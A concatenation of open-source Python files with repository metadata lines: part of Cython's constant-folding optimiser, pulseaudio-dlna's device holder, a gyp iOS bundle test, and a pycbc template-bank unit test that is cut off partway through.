# now try to calculate the real constant value
try:
node.calculate_constant_result()
# if node.constant_result is not ExprNodes.not_a_constant:
# print node.__class__.__name__, node.constant_result
except (ValueError, TypeError, KeyError, IndexError, AttributeError, ArithmeticError):
# ignore all 'normal' errors here => no constant result
pass
except Exception:
# this looks like a real error
import traceback, sys
traceback.print_exc(file=sys.stdout)
NODE_TYPE_ORDER = [ExprNodes.BoolNode, ExprNodes.CharNode,
ExprNodes.IntNode, ExprNodes.FloatNode]
def _widest_node_class(self, *nodes):
try:
return self.NODE_TYPE_ORDER[
max(map(self.NODE_TYPE_ORDER.index, map(type, nodes)))]
except ValueError:
return None
def _bool_node(self, node, value):
value = bool(value)
return ExprNodes.BoolNode(node.pos, value=value, constant_result=value)
def visit_ExprNode(self, node):
self._calculate_const(node)
return node
def visit_UnopNode(self, node):
self._calculate_const(node)
if not node.has_constant_result():
if node.operator == '!':
return self._handle_NotNode(node)
return node
if not node.operand.is_literal:
return node
if node.operator == '!':
return self._bool_node(node, node.constant_result)
elif isinstance(node.operand, ExprNodes.BoolNode):
return ExprNodes.IntNode(node.pos, value=str(int(node.constant_result)),
type=PyrexTypes.c_int_type,
constant_result=int(node.constant_result))
elif node.operator == '+':
return self._handle_UnaryPlusNode(node)
elif node.operator == '-':
return self._handle_UnaryMinusNode(node)
return node
_negate_operator = {
'in': 'not_in',
'not_in': 'in',
'is': 'is_not',
'is_not': 'is'
}.get
def _handle_NotNode(self, node):
operand = node.operand
if isinstance(operand, ExprNodes.PrimaryCmpNode):
operator = self._negate_operator(operand.operator)
if operator:
node = copy.copy(operand)
node.operator = operator
node = self.visit_PrimaryCmpNode(node)
return node
def _handle_UnaryMinusNode(self, node):
def _negate(value):
if value.startswith('-'):
value = value[1:]
else:
value = '-' + value
return value
node_type = node.operand.type
if isinstance(node.operand, ExprNodes.FloatNode):
# this is a safe operation
return ExprNodes.FloatNode(node.pos, value=_negate(node.operand.value),
type=node_type,
constant_result=node.constant_result)
if node_type.is_int and node_type.signed or \
isinstance(node.operand, ExprNodes.IntNode) and node_type.is_pyobject:
return ExprNodes.IntNode(node.pos, value=_negate(node.operand.value),
type=node_type,
longness=node.operand.longness,
constant_result=node.constant_result)
return node
def _handle_UnaryPlusNode(self, node):
if (node.operand.has_constant_result() and
node.constant_result == node.operand.constant_result):
return node.operand
return node
def visit_BoolBinopNode(self, node):
self._calculate_const(node)
if not node.operand1.has_constant_result():
return node
if node.operand1.constant_result:
if node.operator == 'and':
return node.operand2
else:
return node.operand1
else:
if node.operator == 'and':
return node.operand1
else:
return node.operand2
def visit_BinopNode(self, node):
self._calculate_const(node)
if node.constant_result is ExprNodes.not_a_constant:
return node
if isinstance(node.constant_result, float):
return node
operand1, operand2 = node.operand1, node.operand2
if not operand1.is_literal or not operand2.is_literal:
return node
# now inject a new constant node with the calculated value
try:
type1, type2 = operand1.type, operand2.type
if type1 is None or type2 is None:
return node
except AttributeError:
return node
if type1.is_numeric and type2.is_numeric:
widest_type = PyrexTypes.widest_numeric_type(type1, type2)
else:
widest_type = PyrexTypes.py_object_type
target_class = self._widest_node_class(operand1, operand2)
if target_class is None:
return node
elif target_class is ExprNodes.BoolNode and node.operator in '+-//<<%**>>':
# C arithmetic results in at least an int type
target_class = ExprNodes.IntNode
elif target_class is ExprNodes.CharNode and node.operator in '+-//<<%**>>&|^':
# C arithmetic results in at least an int type
target_class = ExprNodes.IntNode
if target_class is ExprNodes.IntNode:
unsigned = getattr(operand1, 'unsigned', '') and \
getattr(operand2, 'unsigned', '')
longness = "LL"[:max(len(getattr(operand1, 'longness', '')),
len(getattr(operand2, 'longness', '')))]
new_node = ExprNodes.IntNode(pos=node.pos,
unsigned=unsigned, longness=longness,
value=str(int(node.constant_result)),
constant_result=int(node.constant_result))
# IntNode is smart about the type it chooses, so we just
# make sure we were not smarter this time
if widest_type.is_pyobject or new_node.type.is_pyobject:
new_node.type = PyrexTypes.py_object_type
else:
new_node.type = PyrexTypes.widest_numeric_type(widest_type, new_node.type)
else:
if target_class is ExprNodes.BoolNode:
node_value = node.constant_result
else:
node_value = str(node.constant_result)
new_node = target_class(pos=node.pos, type = widest_type,
value = node_value,
constant_result = node.constant_result)
return new_node
def visit_MulNode(self, node):
self._calculate_const(node)
if node.operand1.is_sequence_constructor:
return self._calculate_constant_seq(node, node.operand1, node.operand2)
if isinstance(node.operand1, ExprNodes.IntNode) and \
node.operand2.is_sequence_constructor:
return self._calculate_constant_seq(node, node.operand2, node.operand1)
return self.visit_BinopNode(node)
def _calculate_constant_seq(self, node, sequence_node, factor):
if factor.constant_result != 1 and sequence_node.args:
if isinstance(factor.constant_result, (int, long)) and factor.constant_result <= 0:
del sequence_node.args[:]
sequence_node.mult_factor = None
elif sequence_node.mult_factor is not None:
if (isinstance(factor.constant_result, (int, long)) and
isinstance(sequence_node.mult_factor.constant_result, (int, long))):
value = sequence_node.mult_factor.constant_result * factor.constant_result
sequence_node.mult_factor = ExprNodes.IntNode(
sequence_node.mult_factor.pos,
value=str(value), constant_result=value)
else:
# don't know if we can combine the factors, so don't
return self.visit_BinopNode(node)
else:
sequence_node.mult_factor = factor
return sequence_node
def visit_PrimaryCmpNode(self, node):
# calculate constant partial results in the comparison cascade
self.visitchildren(node, ['operand1'])
left_node = node.operand1
cmp_node = node
while cmp_node is not None:
self.visitchildren(cmp_node, ['operand2'])
right_node = cmp_node.operand2
cmp_node.constant_result = not_a_constant
if left_node.has_constant_result() and right_node.has_constant_result():
try:
cmp_node.calculate_cascaded_constant_result(left_node.constant_result)
except (ValueError, TypeError, KeyError, IndexError, AttributeError, ArithmeticError):
pass # ignore all 'normal' errors here => no constant result
left_node = right_node
cmp_node = cmp_node.cascade
if not node.cascade:
if node.has_constant_result():
return self._bool_node(node, node.constant_result)
return node
# collect partial cascades: [[value, CmpNode...], [value, CmpNode, ...], ...]
cascades = [[node.operand1]]
final_false_result = []
def split_cascades(cmp_node):
if cmp_node.has_constant_result():
if not cmp_node.constant_result:
# False => short-circuit
final_false_result.append(self._bool_node(cmp_node, False))
return
else:
# True => discard and start new cascade
cascades.append([cmp_node.operand2])
else:
# not constant => append to current cascade
cascades[-1].append(cmp_node)
if cmp_node.cascade:
split_cascades(cmp_node.cascade)
split_cascades(node)
cmp_nodes = []
for cascade in cascades:
if len(cascade) < 2:
continue
cmp_node = cascade[1]
pcmp_node = ExprNodes.PrimaryCmpNode(
cmp_node.pos,
operand1=cascade[0],
operator=cmp_node.operator,
operand2=cmp_node.operand2,
constant_result=not_a_constant)
cmp_nodes.append(pcmp_node)
last_cmp_node = pcmp_node
for cmp_node in cascade[2:]:
last_cmp_node.cascade = cmp_node
last_cmp_node = cmp_node
last_cmp_node.cascade = None
if final_false_result:
# last cascade was constant False
cmp_nodes.append(final_false_result[0])
elif not cmp_nodes:
# only constants, but no False result
return self._bool_node(node, True)
node = cmp_nodes[0]
if len(cmp_nodes) == 1:
if node.has_constant_result():
return self._bool_node(node, node.constant_result)
else:
for cmp_node in cmp_nodes[1:]:
node = ExprNodes.BoolBinopNode(
node.pos,
operand1=node,
operator='and',
operand2=cmp_node,
constant_result=not_a_constant)
return node
def visit_CondExprNode(self, node):
self._calculate_const(node)
if not node.test.has_constant_result():
return node
if node.test.constant_result:
return node.true_val
else:
return node.false_val
def visit_IfStatNode(self, node):
self.visitchildren(node)
# eliminate dead code based on constant condition results
if_clauses = []
for if_clause in node.if_clauses:
condition = if_clause.condition
if condition.has_constant_result():
if condition.constant_result:
# always true => subsequent clauses can safely be dropped
node.else_clause = if_clause.body
break
# else: false => drop clause
else:
# unknown result => normal runtime evaluation
if_clauses.append(if_clause)
if if_clauses:
node.if_clauses = if_clauses
return node
elif node.else_clause:
return node.else_clause
else:
return Nodes.StatListNode(node.pos, stats=[])
def visit_SliceIndexNode(self, node):
self._calculate_const(node)
# normalise start/stop values
if node.start is None or node.start.constant_result is None:
start = node.start = None
else:
start = node.start.constant_result
if node.stop is None or node.stop.constant_result is None:
stop = node.stop = None
else:
stop = node.stop.constant_result
# cut down sliced constant sequences
if node.constant_result is not not_a_constant:
base = node.base
if base.is_sequence_constructor and base.mult_factor is None:
base.args = base.args[start:stop]
return base
elif base.is_string_literal:
base = base.as_sliced_node(start, stop)
if base is not None:
return base
return node
def visit_ComprehensionNode(self, node):
self.visitchildren(node)
if isinstance(node.loop, Nodes.StatListNode) and not node.loop.stats:
# loop was pruned already => transform into literal
if node.type is Builtin.list_type:
return ExprNodes.ListNode(
node.pos, args=[], constant_result=[])
elif node.type is Builtin.set_type:
return ExprNodes.SetNode(
node.pos, args=[], constant_result=set())
elif node.type is Builtin.dict_type:
return ExprNodes.DictNode(
node.pos, key_value_pairs=[], constant_result={})
return node
def visit_ForInStatNode(self, node):
self.visitchildren(node)
sequence = node.iterator.sequence
if isinstance(sequence, ExprNodes.SequenceNode):
if not sequence.args:
if node.else_clause:
return node.else_clause
else:
# don't break list comprehensions
return Nodes.StatListNode(node.pos, stats=[])
# iterating over a list literal? => tuples are more efficient
if isinstance(sequence, ExprNodes.ListNode):
node.iterator.sequence = sequence.as_tuple()
return node
def visit_WhileStatNode(self, node):
self.visitchildren(node)
if node.condition and node.condition.has_constant_result():
if node.condition.constant_result:
node.condition = None
node.else_clause = None
else:
return node.else_clause
return node
def visit_ExprStatNode(self, node):
self.visitchildren(node)
if not isinstance(node.expr, ExprNodes.ExprNode):
# ParallelRangeTransform does this ...
return node
# drop unused constant expressions
if node.expr.has_constant_result():
return None
return node
# in the future, other nodes can have their own handler method here
# that can replace them with a constant result node
visit_Node = Visitor.VisitorTransform.recurse_to_children
class FinalOptimizePhase(Visitor.CythonTransform):
"""
This visitor handles several commuting optimizations, and is run
just before the C code generation phase.
The optimizations currently implemented in this class are:
- eliminate None assignment and refcounting for first assignment.
- isinstance -> typecheck for cdef types
- eliminate checks for None and/or types that became redundant after tree changes
"""
def visit_SingleAssignmentNode(self, node):
"""Avoid redundant initialisation of local variables before their
first assignment.
"""
self.visitchildren(node)
if node.first:
lhs = node.lhs
lhs.lhs_of_first_assignment = True
return node
def visit_SimpleCallNode(self, node):
"""Replace generic calls to isinstance(x, type) by a more efficient
type check.
"""
self.visitchildren(node)
if node.function.type.is_cfunction and isinstance(node.function, ExprNodes.NameNode):
if node.function.name == 'isinstance' and len(node.args) == 2:
type_arg = node.args[1]
if type_arg.type.is_builtin_type and type_arg.type.name == 'type':
cython_scope = self.context.cython_scope
node.function.entry = cython_scope.lookup('PyObject_TypeCheck')
node.function.type = node.function.entry.type
PyTypeObjectPtr = PyrexTypes.CPtrType(cython_scope.lookup('PyTypeObject').type)
node.args[1] = ExprNodes.CastNode(node.args[1], PyTypeObjectPtr)
return node
def visit_PyTypeTestNode(self, node):
"""Remove tests for alternatively allowed None values from
type tests when we know that the argument cannot be None
anyway.
"""
self.visitchildren(node)
if not node.notnone:
if not node.arg.may_be_none():
node.notnone = True
return node
def visit_NoneCheckNode(self, node):
"""Remove None checks from expressions that definitely do not
carry a None value.
"""
self.visitchildren(node)
if not node.arg.may_be_none():
return node.arg
return node
class ConsolidateOverflowCheck(Visitor.CythonTransform):
"""
This class facilitates the sharing of overflow checking among all nodes
of a nested arithmetic expression. For example, given the expression
a*b + c, where a, b, and x are all possibly overflowing ints, the entire
sequence will be evaluated and the overflow bit checked only at the end.
"""
overflow_bit_node = None
def visit_Node(self, node):
if self.overflow_bit_node is not None:
saved = self.overflow_bit_node
self.overflow_bit_node = None
self.visitchildren(node)
self.overflow_bit_node = saved
else:
self.visitchildren(node)
return node
def visit_NumBinopNode(self, node):
if node.overflow_check and node.overflow_fold:
top_level_overflow = self.overflow_bit_node is None
if top_level_overflow:
self.overflow_bit_node = node
else:
node.overflow_bit_node = self.overflow_bit_node
node.overflow_check = False
self.visitchildren(node)
if top_level_overflow:
self.overflow_bit_node = None
else:
self.visitchildren(node)
return node
| bsd-3-clause |
Cygn/pulseaudio-dlna | pulseaudio_dlna/holder.py | 3 | 5029 | #!/usr/bin/python
# This file is part of pulseaudio-dlna.
# pulseaudio-dlna is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# pulseaudio-dlna is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with pulseaudio-dlna. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import logging
import threading
import requests
import traceback
import setproctitle
import signal
import time
logger = logging.getLogger('pulseaudio_dlna.holder')
class Holder(object):
def __init__(
self, plugins,
pulse_queue=None, device_filter=None, device_config=None,
proc_title=None):
self.plugins = plugins
self.device_filter = device_filter or None
self.device_config = device_config or {}
self.pulse_queue = pulse_queue
self.devices = {}
self.proc_title = proc_title
self.lock = threading.Lock()
self.__running = True
def initialize(self):
signal.signal(signal.SIGTERM, self.shutdown)
if self.proc_title:
setproctitle.setproctitle(self.proc_title)
def shutdown(self, *args):
if self.__running:
logger.info('Holder.shutdown()')
self.__running = False
def search(self, ttl=None, host=None):
self.initialize()
threads = []
for plugin in self.plugins:
thread = threading.Thread(
target=plugin.discover, args=[self],
kwargs={'ttl': ttl, 'host': host})
thread.daemon = True
threads.append(thread)
try:
for thread in threads:
thread.start()
while self.__running:
all_dead = True
time.sleep(0.1)
for thread in threads:
if thread.is_alive():
all_dead = False
break
if all_dead:
break
except:
traceback.print_exc()
logger.info('Holder.search()')
def lookup(self, locations):
self.initialize()
xmls = {}
for url in locations:
try:
response = requests.get(url, timeout=5)
logger.debug('Response from device ({url})\n{response}'.format(
url=url, response=response.text))
xmls[url] = response.content
except requests.exceptions.Timeout:
logger.warning(
'Could no connect to {url}. '
'Connection timeout.'.format(url=url))
except requests.exceptions.ConnectionError:
logger.warning(
'Could no connect to {url}. '
'Connection refused.'.format(url=url))
for plugin in self.plugins:
for url, xml in xmls.items():
device = plugin.lookup(url, xml)
self.add_device(device)
def add_device(self, device):
if not device:
return
try:
self.lock.acquire()
if device.udn not in self.devices:
if device.validate():
config = self.device_config.get(device.udn, None)
device.activate(config)
if not self.device_filter or \
device.name in self.device_filter:
if config:
logger.info(
'Using device configuration:\n{}'.format(
device.__str__(True)))
self.devices[device.udn] = device
self._send_message('add_device', device)
else:
logger.info('Skipped the device "{name}" ...'.format(
name=device.label))
else:
if device.validate():
self._send_message('update_device', device)
finally:
self.lock.release()
def remove_device(self, device_id):
if not device_id or device_id not in self.devices:
return
try:
self.lock.acquire()
device = self.devices[device_id]
self._send_message('remove_device', device)
del self.devices[device_id]
finally:
self.lock.release()
def _send_message(self, _type, device):
if self.pulse_queue:
self.pulse_queue.put({
'type': _type,
'device': device
})
| gpl-3.0 |
mouhb/cjdns | node_build/dependencies/libuv/build/gyp/test/ios/gyptest-app-ios.py | 61 | 2237 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that ios app bundles are built correctly.
"""
import TestGyp
import subprocess
import sys
def CheckFileXMLPropertyList(file):
output = subprocess.check_output(['file', file])
# The double space after XML is intentional.
if not 'XML document text' in output:
print 'File: Expected XML document text, got %s' % output
test.fail_test()
def CheckFileBinaryPropertyList(file):
output = subprocess.check_output(['file', file])
if not 'Apple binary property list' in output:
print 'File: Expected Apple binary property list, got %s' % output
test.fail_test()
if sys.platform == 'darwin':
test = TestGyp.TestGyp(formats=['xcode', 'ninja'])
test.run_gyp('test.gyp', chdir='app-bundle')
test.build('test.gyp', test.ALL, chdir='app-bundle')
# Test that the extension is .bundle
test.built_file_must_exist('Test App Gyp.app/Test App Gyp',
chdir='app-bundle')
# Info.plist
info_plist = test.built_file_path('Test App Gyp.app/Info.plist',
chdir='app-bundle')
test.built_file_must_exist(info_plist)
CheckFileBinaryPropertyList(info_plist)
# XML Info.plist
info_plist = test.built_file_path('Test App Gyp XML.app/Info.plist',
chdir='app-bundle')
CheckFileXMLPropertyList(info_plist)
# Resources
strings_file = test.built_file_path(
'Test App Gyp.app/English.lproj/InfoPlist.strings',
chdir='app-bundle')
test.built_file_must_exist(strings_file)
CheckFileBinaryPropertyList(strings_file)
test.built_file_must_exist(
'Test App Gyp.app/English.lproj/MainMenu.nib',
chdir='app-bundle')
test.built_file_must_exist(
'Test App Gyp.app/English.lproj/Main_iPhone.storyboardc',
chdir='app-bundle')
# Packaging
test.built_file_must_exist('Test App Gyp.app/PkgInfo',
chdir='app-bundle')
test.built_file_must_match('Test App Gyp.app/PkgInfo', 'APPLause',
chdir='app-bundle')
test.pass_test()
| gpl-3.0 |
ahnitz/pycbc | test/test_tmpltbank.py | 9 | 25760 | # Copyright (C) 2013 Ian Harry
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# =============================================================================
#
# Preamble
#
# =============================================================================
#
"""
These are the unittests for the pycbc.tmpltbank module
"""
from __future__ import division
import os
import numpy
import pycbc.tmpltbank
import pycbc.psd
import pycbc.pnutils
from pycbc import pnutils
from pycbc.types import Array
from pycbc.filter import match
from pycbc.waveform import get_fd_waveform
from six.moves import range
import difflib
import sys
import matplotlib
matplotlib.use('Agg')
import pylab
import unittest
from utils import parse_args_cpu_only, simple_exit
# This will return whatever is appropriate, depending on whether this
# particular instance of the unittest was called for CPU, CUDA, or OpenCL
parse_args_cpu_only("Template bank module")
import argparse
parser = argparse.ArgumentParser()
def update_mass_parameters(tmpltbank_class):
"""
Choose various sets of mass parameters for testing.
"""
num_comp_masses = 3
min_mass1 = [1,2,6]
max_mass1 = [5,8,12]
min_mass2 = [1,1,1]
max_mass2 = [5,5,5]
num_tot_masses = 3
# These *must* be provided
min_tot_mass = [None, 2.5, 3.5]
max_tot_mass = [None, 11, 7.5]
num_chirp_masses = 3
max_chirp_mass = [None, 2.43, 3.5]
min_chirp_mass = [None, 1.218, 2.43]
num_etas = 3
max_eta = [0.25, 0.24, 0.23]
min_eta = [None, 0.16, 0.17]
max_iter_idx = num_comp_masses * num_tot_masses *\
num_chirp_masses * num_etas
for idx in range(max_iter_idx):
comp_masses_idx = idx % num_comp_masses
tmpltbank_class.min_mass1 = min_mass1[comp_masses_idx]
tmpltbank_class.max_mass1 = max_mass1[comp_masses_idx]
tmpltbank_class.min_mass2 = min_mass2[comp_masses_idx]
tmpltbank_class.max_mass2 = max_mass2[comp_masses_idx]
reduced_idx = idx // num_comp_masses
tot_mass_idx = reduced_idx % num_tot_masses
tmpltbank_class.min_total_mass = min_tot_mass[tot_mass_idx]
tmpltbank_class.max_total_mass = max_tot_mass[tot_mass_idx]
reduced_idx = reduced_idx // num_tot_masses
chirp_mass_idx = reduced_idx % num_chirp_masses
tmpltbank_class.min_chirp_mass = min_chirp_mass[chirp_mass_idx]
tmpltbank_class.max_chirp_mass = max_chirp_mass[chirp_mass_idx]
reduced_idx = reduced_idx // num_chirp_masses
eta_idx = reduced_idx
tmpltbank_class.max_eta = max_eta[eta_idx]
tmpltbank_class.min_eta = min_eta[eta_idx]
yield idx
return
class TmpltbankTestClass(unittest.TestCase):
def setUp(self):
# Where are my data files?
if os.path.isfile('test/data/ZERO_DET_high_P.txt'):
self.dataDir = 'test/data/'
elif os.path.isfile('data/ZERO_DET_high_P.txt'):
self.dataDir = 'data/'
else:
self.assertTrue(False, msg="Cannot find data files!")
self.deltaF = 0.1
self.f_low = 15
self.f_upper = 2000
self.f0 = 70
self.sampleRate = 4096
self.pnOrder = 'threePointFivePN'
self.min_mass1 = 1
self.min_mass2 = 1
self.max_mass1 = 5
self.max_mass2 = 5
self.max_ns_spin_mag = 0.5
self.max_bh_spin_mag = 0.9
self.ns_bh_boundary_mass = 2.0
self.min_total_mass = 2.5
self.max_total_mass = 6.0
self.max_chirp_mass = 2.4375415772291475
self.min_chirp_mass = 1.2187707886145738
self.max_eta = 0.24
self.min_eta = 0.16
# Sanity check these
pycbc.tmpltbank.verify_mass_range_options(self, parser=parser)
# Need to use F2 metric for ethinca
self.ethincaOrder = 'threePointFivePN'
self.ethincaCutoff = 'SchwarzISCO'
self.ethincaFreqStep = 10.
self.segLen = 1./self.deltaF
self.psdSize = int(self.segLen * self.sampleRate / 2.) + 1
self.psd = pycbc.psd.from_txt('%sZERO_DET_high_P.txt' %(self.dataDir),\
self.psdSize, self.deltaF, self.f_low, is_asd_file=True)
match_psd_size = int(256 * self.sampleRate / 2.) + 1
self.psd_for_match = pycbc.psd.from_txt\
('%sZERO_DET_high_P.txt' %(self.dataDir), match_psd_size,
1./256., self.f_low, is_asd_file=True)
metricParams = pycbc.tmpltbank.metricParameters(self.pnOrder,\
self.f_low, self.f_upper, self.deltaF, self.f0)
metricParams.psd = self.psd
massRangeParams = pycbc.tmpltbank.massRangeParameters(self.min_mass1,\
self.max_mass1, self.min_mass2, self.max_mass2,\
maxNSSpinMag=self.max_ns_spin_mag,\
maxBHSpinMag=self.max_bh_spin_mag,\
maxTotMass=self.max_total_mass,\
minTotMass=self.min_total_mass,\
max_chirp_mass=self.max_chirp_mass,\
min_chirp_mass=self.min_chirp_mass,\
maxEta=self.max_eta,\
minEta=self.min_eta,\
ns_bh_boundary_mass=self.ns_bh_boundary_mass)
# And again with the nsbh flag
massRangeParams2 = pycbc.tmpltbank.massRangeParameters(self.min_mass1,\
self.max_mass1, self.min_mass2, self.max_mass2,\
maxNSSpinMag=self.max_ns_spin_mag,\
maxBHSpinMag=self.max_bh_spin_mag,\
maxTotMass=self.max_total_mass,\
minTotMass=self.min_total_mass,\
max_chirp_mass=self.max_chirp_mass,\
min_chirp_mass=self.min_chirp_mass,\
maxEta=self.max_eta,\
minEta=self.min_eta,\
nsbhFlag=True)
metricParams = pycbc.tmpltbank.determine_eigen_directions(metricParams)
vals=pycbc.tmpltbank.estimate_mass_range(100000, massRangeParams,\
metricParams, self.f_upper, covary=False)
cov = numpy.cov(vals)
_,self.evecsCV = numpy.linalg.eig(cov)
metricParams.evecsCV = {}
metricParams.evecsCV[self.f_upper] = self.evecsCV
vals=pycbc.tmpltbank.estimate_mass_range(100000, massRangeParams,\
metricParams, self.f_upper, covary=False)
self.metricParams = metricParams
self.massRangeParams = massRangeParams
self.massRangeParams2 = massRangeParams2
self.ethincaParams = pycbc.tmpltbank.ethincaParameters(
self.ethincaOrder, self.ethincaCutoff, self.ethincaFreqStep,
full_ethinca=False, time_ethinca=False)
self.xis = vals
def test_eigen_directions(self):
evalsStock = Array(numpy.loadtxt('%sstockEvals.dat'%(self.dataDir)))
evecsStock = Array(numpy.loadtxt('%sstockEvecs.dat'%(self.dataDir)))
maxEval = max(evalsStock)
evalsCurr = Array(self.metricParams.evals[self.f_upper])
evecsCurr = Array(self.metricParams.evecs[self.f_upper])
numpy.savetxt('newEvals.dat', evalsCurr)
numpy.savetxt('newEvecs.dat', evecsCurr)
errMsg = "pycbc.tmpltbank.determine_eigen_directions has failed "
errMsg += "sanity check."
evalsDiff = abs(evalsCurr - evalsStock)/maxEval
self.assertTrue(not (evalsDiff > 1E-5).any(), msg=errMsg)
for stock,test in zip(evecsStock.data,evecsCurr.data):
stockScaled = stock * evalsCurr.data**0.5
testScaled = test * evalsCurr.data**0.5
diff = stockScaled - testScaled
self.assertTrue(not (diff > 1E-4).any(), msg=errMsg)
def test_get_random_mass(self):
# Want to do this for a variety of mass combinations
for i in update_mass_parameters(self):
curr_min_mass = self.min_total_mass
curr_max_mass = self.max_total_mass
try:
pycbc.tmpltbank.verify_mass_range_options(self, parser=parser)
except ValueError:
# Some of the inputs are unphysical and will fail.
# These cases are known to fail, the inputs are unphysical
# 35 has inconsistent total mass and eta restrictions
# 38 Component mass, [upper] chirp mass and [lower] eta limits
# rule out the entire space.
# 41 Same as 38
# 44 Same as 38
# 62 From component mass and total mass limits only total masses
# between 7 and 7.5 are possible. This range all has eta
# lower than the limit of 0.17.
# 65 Same as 38
# 68 Same as 38
# 71 Same as 38
# 80 Same as 62
if i in [35,38,41,44,62,65,68,71,80]:
continue
raise
# Check that if the mass limits have changed, it was right to do so
# This is not exhaustive, but gets most things
if not self.min_total_mass == curr_min_mass:
min_comp_mass = self.min_mass1 + self.min_mass2
min_eta = self.min_mass1 * self.min_mass2 /\
(min_comp_mass * min_comp_mass)
min_chirp_mass = min_comp_mass * min_eta**(3./5.)
if self.min_total_mass == min_comp_mass:
# Okay, the total mass is changed by the components
pass
elif (self.min_eta and min_eta < self.min_eta) or \
(self.max_eta and min_eta > self.max_eta):
# Okay, not possible from eta
pass
elif min_chirp_mass < self.min_chirp_mass:
# Okay, not possible from chirp mass
pass
else:
err_msg = "Minimum total mass changed unexpectedly."
print(self.min_total_mass, curr_min_mass)
print(self.min_mass1, self.min_mass2, min_comp_mass)
print(min_eta, self.min_eta, self.max_eta)
print(min_chirp_mass, self.min_chirp_mass)
self.fail(err_msg)
if not self.max_total_mass == curr_max_mass:
max_comp_mass = self.max_mass1 + self.max_mass2
max_eta = self.max_mass1 * self.max_mass2 /\
(max_comp_mass * max_comp_mass)
max_chirp_mass = max_comp_mass * max_eta**(3./5.)
if self.max_total_mass == max_comp_mass:
# Okay, the total mass is changed by the components
pass
elif (self.min_eta and max_eta < self.min_eta) or\
(self.max_eta and max_eta > self.max_eta):
# Okay, not possible from eta
pass
elif max_chirp_mass > self.max_chirp_mass:
# Okay, not possible from chirp mass
pass
else:
err_msg = "Maximum total mass changed unexpectedly."
self.fail(err_msg)
massRangeParams = pycbc.tmpltbank.massRangeParameters(\
self.min_mass1,\
self.max_mass1, self.min_mass2, self.max_mass2,\
maxNSSpinMag=self.max_ns_spin_mag,\
maxBHSpinMag=self.max_bh_spin_mag,\
maxTotMass=self.max_total_mass,\
minTotMass=self.min_total_mass,\
max_chirp_mass=self.max_chirp_mass,\
min_chirp_mass=self.min_chirp_mass,\
maxEta=self.max_eta,\
minEta=self.min_eta,\
ns_bh_boundary_mass=self.ns_bh_boundary_mass)
# And again with the nsbh flag
massRangeParams2 = pycbc.tmpltbank.massRangeParameters(\
self.min_mass1,\
self.max_mass1, self.min_mass2, self.max_mass2,\
maxNSSpinMag=self.max_ns_spin_mag,\
maxBHSpinMag=self.max_bh_spin_mag,\
maxTotMass=self.max_total_mass,\
minTotMass=self.min_total_mass,\
max_chirp_mass=self.max_chirp_mass,\
min_chirp_mass=self.min_chirp_mass,\
maxEta=self.max_eta,\
minEta=self.min_eta,\
nsbhFlag=True)
mass1, mass2, spin1z, spin2z = \
pycbc.tmpltbank.get_random_mass(100000, massRangeParams)
mass = mass1 + mass2
errMsg = "pycbc.tmpltbank.get_random_mass returns invalid ranges."
self.assertTrue(not (mass < self.min_total_mass).any(),msg=errMsg)
self.assertTrue(not (mass > self.max_total_mass).any(),msg=errMsg)
self.assertTrue(not (mass1 > self.max_mass1 * 1.001).any(),
msg=errMsg)
self.assertTrue(not (mass1 < self.min_mass1 * 0.999).any(),
msg=errMsg)
self.assertTrue(not (mass2 > self.max_mass2 * 1.001).any(),
msg=errMsg)
self.assertTrue(not (mass2 < self.min_mass2 * 0.999).any(),
msg=errMsg)
self.assertTrue(not (mass1 < mass2).any(),msg=errMsg)
# Chirp mass and eta
mchirp, eta = pnutils.mass1_mass2_to_mchirp_eta(mass1,mass2)
if self.max_chirp_mass:
self.assertTrue(not (mchirp > self.max_chirp_mass*1.0001).any(),
msg=errMsg)
if self.min_chirp_mass:
self.assertTrue(not (mchirp < self.min_chirp_mass*0.9999).any(),
msg=errMsg)
if self.min_eta:
self.assertTrue(not (eta < self.min_eta*0.9999).any(),
msg=errMsg)
self.assertTrue(not (eta > self.max_eta*1.0001).any(),
msg=errMsg)
nsSpin1 = spin1z[mass1 < self.ns_bh_boundary_mass]
nsSpin2 = spin2z[mass2 < self.ns_bh_boundary_mass]
bhSpin1 = spin1z[mass1 > self.ns_bh_boundary_mass]
bhSpin2 = spin2z[mass2 > self.ns_bh_boundary_mass]
self.assertTrue(not (abs(nsSpin1) > 0.5).any(), msg=errMsg)
self.assertTrue(not (abs(nsSpin2) > 0.5).any(), msg=errMsg)
self.assertTrue(not (abs(bhSpin1) > 0.9).any(), msg=errMsg)
self.assertTrue(not (abs(bhSpin2) > 0.9).any(), msg=errMsg)
# Check that *some* spins are bigger than 0.5
if len(bhSpin1):
self.assertTrue((abs(bhSpin1) > 0.5).any(), msg=errMsg)
if len(bhSpin2):
self.assertTrue((abs(bhSpin2) > 0.5).any(), msg=errMsg)
# Check nsbh flag
mass1, mass2, spin1z, spin2z = \
pycbc.tmpltbank.get_random_mass(100000, massRangeParams2)
self.assertTrue(not (abs(spin1z) > 0.9).any(), msg=errMsg)
self.assertTrue(not (abs(spin2z) > 0.5).any(), msg=errMsg)
self.assertTrue((abs(spin1z) > 0.5).any(), msg=errMsg)
def test_metric_match_prediction(self):
mass1a, mass2a, spin1za, spin2za = \
pycbc.tmpltbank.get_random_mass(10, self.massRangeParams)
mass1b, mass2b, spin1zb, spin2zb = \
pycbc.tmpltbank.get_random_mass(10, self.massRangeParams)
for idx in range(10):
masses1 = [mass1a[idx], mass2a[idx], spin1za[idx], spin2za[idx]]
masses2 = [mass1b[idx], mass2b[idx], spin1zb[idx], spin2zb[idx]]
dist, _, _ = pycbc.tmpltbank.get_point_distance \
